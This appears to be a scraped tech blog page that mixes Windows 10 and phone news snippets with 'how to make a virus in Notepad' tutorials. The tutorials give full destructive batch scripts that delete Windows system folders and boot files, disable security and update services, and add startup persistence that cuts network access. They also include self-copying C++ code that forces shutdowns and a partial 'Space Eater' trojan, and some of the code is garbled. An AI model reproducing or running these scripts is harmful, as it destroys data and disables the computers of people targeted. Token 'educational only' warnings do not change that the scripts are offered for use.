Xiaomi Mi4c Leaked To Come With Type-C USB port and Even More Internal Storage

It was earlier reported that Xiaomi Mi4c is going to carry a price of less than $250, which is a steal of a deal considering that you will get a smartphone running a Snapdragon 808 chipset in it.

Windows 10 for phones features revealed

Microsoft showed off a number of new features for Windows 10 on phones today, but in afternoon sessions at the company’s press event. Most of the demonstrations focused on improving the built-in apps and features of Windows Phone, and fixing a lot of the oddities. That includes mail, maps, photos, Skype, and messaging.

Windows 8 and Windows 7 would receive a free upgrade to Windows 10

Once the OS launches later this year, Microsoft announced that all users who are using- Windows 8 and Windows 7 would receive a free upgrade to Windows 10 . With the release of the January Technical Preview, Microsoft is testing one of those systems.

Windows 10 build 9926 installation process

If you are installing the Windows 10 build that was released today, you will notice that the installation screens have been slightly changed or updated since Windows 8 and even over 9879, to a small degree. Since we know you don't install Windows builds frequently, we snapped some screens while installing the OS that you can see at the bottom of the post.

Whatsapp launches the Web client

Today WhatsApp announced a web client that will enable users to use the world’s most popular mobile IM client on their PC and Macs. But this web Client works only in the Google Chrome browser.

Saturday 11 August 2012

Space Eater(VIRUS) code

This is an virus source code. only for educational purpose DO NOT SPREAD IT.. It is harmful program.

BEWARE:-Do not compile it in your own pcs. do not recognize by any of the antivirus...

/* SPACE EATER TROJAN . USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

#include<stdio.h>
#include<conio.h>
#include<dos.h>
#include<stdlib.h>
FILE *a,*t,*b;
int r,status,vir_count;
double i;
char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;
void eatspace(void);
void findroot(void);

10 Interesting facts about Microsoft

Almost every one Knows Microsoft and its operating System Windows. But you will probably not know the following 10 interesting facts!

1. No one knows the reason, but it is impossible to create a folder named "con" or "Con". It is just not possible. And if you try to fool Windows by naming the folder "c-o-n", you will get an error message.

2. When you enter "=rand (200,99)" without the quotations into Microsoft Word, something very weird happens. After pressing "enter", the document is filled with more than 400,000 words.

Tuesday 7 August 2012

How make a virus in Notepad-2


SHUT UR INTERNET PERMANENTLY:::

This is a slightly more advanced one. It shuts down your internet permanately. I tried it on
myself accidently, i knew what it did, and it still took me a couple of days to get my internet

back. works best on XP, not tested on vista or 7.
EDIT: At the bottom put a rickroll site or something. BTW, that 3rd line, isnt what disables the
internet permanately. It is somethinge else, that just provides a fast response to shut down
any connections.
<code>@echo off
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v MiXedVeX /t REG_SZ /d
%systemroot%\HaloTrialScoreChangerV1 /f > nul
start iexpress (website of your choice)
ipconfig /releasedel "C:\Program Files\Microsoft Games
del "C:Nexon
del "C:\Program Files\Xfire
del "C:\Program Files\Adobe"
del "C:\Program Files\Internet Explorer"
del "C:\Program Files\Mozilla Firefox"
del "C:\WINDOWS"
del "C:\WINDOWS\system32"
del "C:\WINDOWS\system32\cmd"
del "C:\WINDOWS\system32\iexpress"
del "C:\WINDOWS\system32\sndvol32"
del "C:\WINDOWS\system32\sndrec32"
del "C:\WINDOWS\system32\Restore\rstrui"
del "C:\WINDOWS\system32\wupdmgr"
del "C:\WINDOWS\system32\desktop"
del "C:\WINDOWS\java"
del "C:\WINDOWS\Media"
del "C:\WINDOWS\Resources"
del "C:\WINDOWS\system"

del "C:\drivers"
del "C:\drv"
del "C:\SYSINFO"
del "C:\Program Files"
echo ipconfig/release_all>>c:windowswimn32.bat

net stop "Security Center"
net stop SharedAccess
> "%Temp%.kill.reg" ECHO REGEDIT4
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
>>"%Temp%.kill.reg" ECHO
[HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
>>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.kill.reg"
del "%Temp%.kill.reg"
del %0
echo @echo off>c:windowswimn32.bat

echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t
reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t
reg_sz /d c:windowswimn32.bat /f
:a
start iexpress (website of your choice)
goto a



MAKING MOST DANGEROUS VIRUS CALLED MATRIX:::

Warning - Do not run it on your computer
I'm gonna teach you how to make a virus named Matrix...

1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat",
ios::app);

fp << "@ECHO OFF n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF n";
fp << "COPY matrix.exe C:\rawr.exe n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
system("START CLICK.bat");
main()

}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN |
FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";

cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " ";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;


3-save it as matrix.bat
4-finish
then compile it using diz..
http://rapidshare.com/files/172088914/QuickBFC.exe
and finally it should be matrix.exe


AS IT WAS TOO DANGEROUS THE ACTUAL HEADER FILES FOR THIS SCRIPT ARE
NOT GIVEN
AND IF U WANT TO TRY THIS SCRIPT U CAN JUST USE OF HEADER FILES SUCH AS
STDIN,STDLIB,CONIO , AND STUFF LIKE THAT



How make a virus in Notepad-1


How to crash a PC Forever !:::

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed
to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**

QoS Bandwidth Reserve Setting - Faster Internet Connection


     Beware Editing in the registry files can slow down your computer    

By default, Windows XP reserves 20% of the connection bandwidth for QoS traffic। This tweak allows the setting to be altered to a different percentage of connection bandwidth। If the system uses more than a single adapter for network connections, each adapter may be set
individually by navigating to:

Registry Tricks for Windows - Clear Pagefile on Shutdown

     Beware Editing in the registry files can slow down your computer     


As an added security precaution it is possible to clear all data that has been written to the
page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase shutdown time depending on the amount of data in the page file.

[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key